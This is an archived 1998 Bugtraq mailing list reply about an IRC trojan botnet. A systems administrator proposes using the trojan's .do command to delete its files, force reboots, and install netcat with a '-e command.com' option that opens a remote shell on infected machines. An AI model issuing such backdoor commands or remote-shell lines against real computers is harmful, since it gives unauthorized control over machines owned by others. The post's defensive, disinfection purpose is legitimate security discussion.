Bugtraq mailing list archives
Re: Internet Wide DOS Attack using IRC
From: gti () HOPI DTCC EDU (George Imburgia)
Date: Sat, 3 Oct 1998 08:30:08 -0400
On Fri, 2 Oct 1998, Samuel Cossette wrote:
When a clone (Havoc call an infected computer a "Drone") is connected on irc anybody can control this with Private msg command (.join #chan, .part, .do [raw command]). 2-3 week ago the infected chan get about 500-700 drones (stable). My personnal estimation of infected computer it's 15000+.
With the DO command enabled, they gave us the means to remotely disable this trojan. Something to the effect of; msg <nick> .do del c:\windows\system\oce*.* Then, msg <nick> .do <some evil command to lock up the machine, forcing a reboot>. I'd be happy to write something cleaner and more specific, if someone could forward me a copy of this trojan, or at least a directory listing of the c:\windows\system directory on an infected machine. The mIRC DO command is very powerful, and can be used to install netcat on the remote machine. We could then .msg <nick> <path to netcat>\nc.exe -L -p <any port> <your ip> -t -e command.com, giving a remote command prompt to investigate/disinfect the machine. Anyone with a copy of this, feel free to mail me here, or contact Phatass on EFnet. ______________________________________________________________________________ George Imburgia e-mail: gti () hopi dtcc edu Systems Administrator Phone: (302)739-4068 Delaware Technical & Community College Fax: (302)739-3345 Office of the President Pager: (302)741-5962
Current thread:
- Re: Internet Wide DOS Attack using IRC Paralyse (Oct 02)
- <Possible follow-ups>
- Re: Internet Wide DOS Attack using IRC Samuel Cossette (Oct 02)
- Re: Internet Wide DOS Attack using IRC Kameron Gasso (Oct 02)
- Re: Internet Wide DOS Attack using IRC Glenn Tucker (Oct 02)
- Re: Internet Wide DOS Attack using IRC Diane Bruce (Oct 02)
- Re: Internet Wide DOS Attack using IRC George Imburgia (Oct 03)
- Re: Internet Wide DOS Attack using IRC Kameron Gasso (Oct 02)
- Re: Internet Wide DOS Attack using IRC Samuel Cossette (Oct 02)
- Re: Internet Wide DOS Attack using IRC Samuel Cossette (Oct 03)